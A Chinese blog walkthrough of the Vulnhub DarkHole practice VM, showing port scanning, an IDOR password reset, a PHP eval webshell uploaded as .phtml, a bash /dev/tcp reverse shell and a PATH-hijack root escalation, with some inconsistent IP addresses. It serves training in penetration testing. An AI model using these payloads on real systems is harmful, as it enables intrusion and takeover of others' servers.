看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole

已于 2023-05-31 20:49:13 修改
阅读量1.7k 收藏 22
点赞数 10
分类专栏: 渗透测试 # Vulnhub靶场 文章标签: Vulnhub靶机 逻辑漏洞 文件上传GetShell 提权
于 2023-05-30 16:58:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/130947347
版权

Vulnhub靶机DarkHole渗透测试详解

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这是一个漏洞靶机,老样子需要找到flag即可。

Vulnhub靶机下载:

官网链接:https://download.vulnhub.com/darkhole/DarkHole.zip

Vulnhub靶机安装:

下载好了把安装包解压 然后使用VMware打开即可。
在这里插入图片描述

Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l发现主机

在这里插入图片描述
在这里插入图片描述
渗透机:kali IP :172.16.5.120 靶机IP :172.16.5.156

使用命令:nmap -sS -sV -T4 -n -p- 192.168.0.156

在这里插入图片描述
发现就开启了2280端口老样子先访问80端口,老样子扫一下端口三件套:dirb、dirsearch、gobuste扫描找到登入入口

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

②:逻辑漏洞:

先注册一个账号使用admin注册不行会显示下面爆红 随便注册一个666/666 使用BP抓包修改密码把id=3改为1即可。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
这里现在密码已经更新 已经修改好了从新登入:admin/admin 发现登入成功!!!! 看到一个上传点 🆗又可以继续利用了

在这里插入图片描述

③:文件上传GetShell:

这里过滤了很多试了好几个都不行(连接不上)可以使用phar或者phtml进行绕过

新建一个文档输入: <?php @eval($_POST['cmd']);?> 把后缀改为png、jpg、gif 然后抓包 修改为phtml然后放包 有个蓝色的file点击即可
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

④:反弹Shell:
nc -nvlp 7777      #kaili监听端口   
bash -c 'bash -i >& /dev/tcp/172.16.5.156/7777 0>&1'

在这里插入图片描述

⑤:sudo root提权:

cat /etc/passwd 发现了john用户 在家目录下面发现了一个toto文件执行发现和id一样的功能

然后还有userpasswd文件 发现没有权限查看 创建名为id的文件,将bash文件的位置写入id当中,然后使用export修改环境变量,优先加载tmp下的id文件,echo输出path查看是否修改成功

在这里插入图片描述
在这里插入图片描述

cd /tmp
touch id
echo "/bin/bash" > id
chmod 777 id
export PATH=/tmp:$PATH
cd /home/john
./toto

在这里插入图片描述

然后现在我们再次执行就可以查看账号和密码文件了 直接使用SSH进行连接:john/root123

在这里插入图片描述

import pty;pty.spawn("/bin/bash")  ##执行命令输入密码,回显可知,john可以以root的身份执行file.py
cat file.py
sudo python3 /home/john/file.py  ##sudo执行

在这里插入图片描述

⑥:获取FLAG:

在这里插入图片描述
至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!

Vulnhub靶机渗透总结:

这个靶机难度适中

1.信息收集 获取ip地址 和端口信息 web扫描工具:nikto,dirb,dirbuster
2.这里有个新的知识点:逻辑漏洞 通过修改密码进行改包 完成绕过
3.文件上传漏洞 phtmlphar的绕过 CTF考的比较多
4.nc反弹Shell的命令这个是固定了(背下来)
5.sudo root提权的学习

希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

落寞的魚丶
关注
  • 10
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
VulnHub DarkHole靶机
qq_39428734的博客
04-13 502
扫描局域网内存活主机 得到靶机IP 使用namp扫描存活靶机开放了哪些端口 得到靶机开放了22,80端口 进入80端口的网页服务 查看网页源代码没有发现任何东西 爆破目录,查看有那些敏感目录 看到了一个配置文件和后台管理界面,登录界面等等 在config目录里面查看到了database.php文件 我们把它下载下来 啥也没有。。 后台管理界面显示没有权限 登录界面中看到了 正式的登录界面 我们去注册界面看看 注册一个用户并登录试试
靶场-DarkHole1
weixin_58602402的博客
06-16 309
修改密码进行抓包,发现有个id值,在sql注入输入id为1时返回无权访问,猜测id值代表用户,构造payload修改其它用户的密码。4.切换回到/home/john 文件夹,再次执行./toto,就会启动一个 bash,这个 bash 就会切换 shell。2.发现/home/john/toto,切换到这个位置去执行,返回不同的id。开始进行绕过,直接将后缀改为jpg成功上传,同时找到文件上传的位置。2.通过蚁剑将木马上传,kali开启监听等待上线,反弹失败。7.发现个文件上传,尝试上传发现具有限制。
VulnHub-DarkHole_2靶机实战(超详细保姆级程)
精品博客,你值得一看~
08-13 3601
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
最新发布
小司机的奥拓
04-23 1651
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅我也会不定期再中间更新复现文章链接目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
VulnHub-DarkHole_1靶机详细渗透
MRS_jianai的博客
12-30 2192
VulnHub-DarkHole:1靶机详细渗透
VulnHub-DarkHole_2靶机实战(超详细保姆级程)(1),2024互联网大厂网络安全面经合集
2301_77116622的博客
04-14 1027
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。id=1’ and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.两款工具达成的效果是一致的,大家自行选择喜欢的工具即可。
vulnhub靶机darkhole
weixin_52450702的博客
11-28 652
vulnhub靶机darkhole
Vulnhub: DarkHole:1靶机
qq_43884092的博客
06-28 138
越权修改admin用户密码,上传phtml后缀的webshell,环境变量和sudo提权
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
DarkHole靶机渗透
W_an_feng_的博客
06-10 227
DarkHole靶机渗透
关于 Apache 常见安全漏洞 --vulhub靶场练习
m0_60742333的博客
03-23 1499
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。以下实验环境皆来自于vulhub实验靶场,如下图示例,下载好vulhub环境进入要测试的漏洞文件夹,使用docker-compose up -d 命令开启实验。7. 将请求方式修改成POST,然后在请求体写入echo,并将数据包放行即可,使用bash进行反弹shell。后缀进行解析,导致绕过一些服务器的安全策略。
Neos的渗透测试靶机练习——DarkHole-2
qq_38678845的博客
01-22 1035
一次渗透测试靶机练习
Vulhub靶场之weblogic漏洞复现
weixin_66717977的博客
03-21 1434
vulhub靶场上weblogic的漏洞复现
vulhub靶场struts2漏洞复现
weixin_44300286的博客
03-06 2294
0x01、S2-001远程代码执行漏洞 原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响版本 Struts 2.0.0 - Struts 2.0.8 poc 执行任意命令 %{#a=(new java.lan
kali linux渗透测试靶机
02-23
Kali Linux是一种专门用于渗透测试和网络安全的操作系统。它集成了大量的渗透测试工具和资源,使得安全专业人员能够有效地评估和保护网络系统的安全性。 Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux渗透测试靶机: 1. Metasploitable:Metasploitable是一个故意构建的易受攻击的虚拟机,它包含了多个漏洞和弱点,可以用于学习和实践Metasploit框架的使用。 2. DVWA(Damn Vulnerable Web Application):DVWA是一个故意构建的Web应用程序,包含了多个常见的Web漏洞,如SQL注入、XSS等,可以用于学习和实践Web应用程序渗透测试技术。 3. OWASP Mutillidae II:Mutillidae II是一个故意构建的Web应用程序,旨在模拟真实世界中的各种Web漏洞和攻击场景,包括SQL注入、文件包含等。 4. Hack The Box:Hack The Box是一个在线平台,提供了一系列的渗透测试靶机,每个靶机都有不同的漏洞和挑战,可以用于测试和提高渗透测试技能。 这些渗透测试靶机都可以在Kali Linux上进行安装和使用。通过实践和探索这些靶机,安全专业人员可以提高他们的渗透测试技能,并了解如何保护网络系统免受各种攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值